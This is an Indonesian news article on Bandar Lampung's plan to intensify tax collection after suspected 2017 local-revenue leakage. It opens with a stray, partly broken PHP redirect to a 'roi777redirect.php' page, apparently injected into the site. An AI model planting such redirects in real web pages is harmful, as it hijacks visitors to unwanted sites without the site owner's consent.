header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pemkot Intensifkan Penagihan WP -
Pemkot Intensifkan Penagihan WP

Didugaan Ada Kebocoran PAD 2017

TRANSLAMPUNG.COM, BANDARLAMPUNG – Adanya dugaan kebocoran Pendapatan Asli Daerah (PAD) 2017 yang menyebabkan tidak memenuhi target, Pemerintah Kota (Pemkot) Bandarlampung akan mengintensifkan penagihan terhadap Wajib Pajak (WP).

Hal tersebut diungkapkan Wali Kota Bandarlampung Herman HN pada paripurna DPRD tentang jawaban Wali Kota atas pemandangan umum fraksi-fraksi dalam pelaksanaan APBD 2017.

Menurutnya, rendahnya capaian PAD dari yang telah ditetapkan dalam APBD 2017 dikarenakan masih rendahnya kesadaran WP untuk melaksanakan Kewajibannya membayar pajak, belum maksimalnya pengenaan Hukuman/Denda bagi peunggak pajak karena hanya dikenakan sanksi/denda sebesar 2 persen perbulan terhadap pokok pajak.

Kemudian, sarana dan prasarana penunjang belum optimal. Dimana, sistem pengelolaan pajak terkomputerisasi secara online belu dilaksanakan sepenuhnya.

“Kami menetapkan target PAD tahun 2017 berdasarkan potensi dan trend pertumbuhan pendapatan dalam beberapa tahun terakhir. Nah, kedepan, kami akan memfokuskan pada hasil kajian dan survei potensi, sehingga perhitungan target PAD akan lebih realistis sesuai dengan kondisi potensi yang ada,” jelasnya.

Ada beberapa upaya yang telah dilakukan dalam meningkatkan PAD, diantaranya penagihan pajak secara intensif setiap bulannya, selain itu untuk mencegah terjadinya kebocoran dalam pembayaran pajak, bulan Juli ini akan dipasang Tapping Box.

“BBPRD juga sudah memanggil WP yang membayar pajaknya masih rendah, kami juga mendata objek pajak baru dan peremajaan data yang dilakukan oleh UPT. Nanti, pembayaran pajak akan menggunakan e-Billing melalui Simpatda,” bebernya.

Tidak hanya itu, sambung Herman HN, pihaknya akan mengintensifkan pengawasan terhadap 20 unit UPTD BPPRD dalam upaya penagihan pajak tahun berjalan maupun penunggakan pajak.

“Dari berbagai sisi akan kita lakukan untuk meningkatkan PAD ditahun 2018. Mudah-mudahan apa yang sudah ditetapkan dapat berjalan dengan baik,” katanya. (jef/hkw)

News Reporter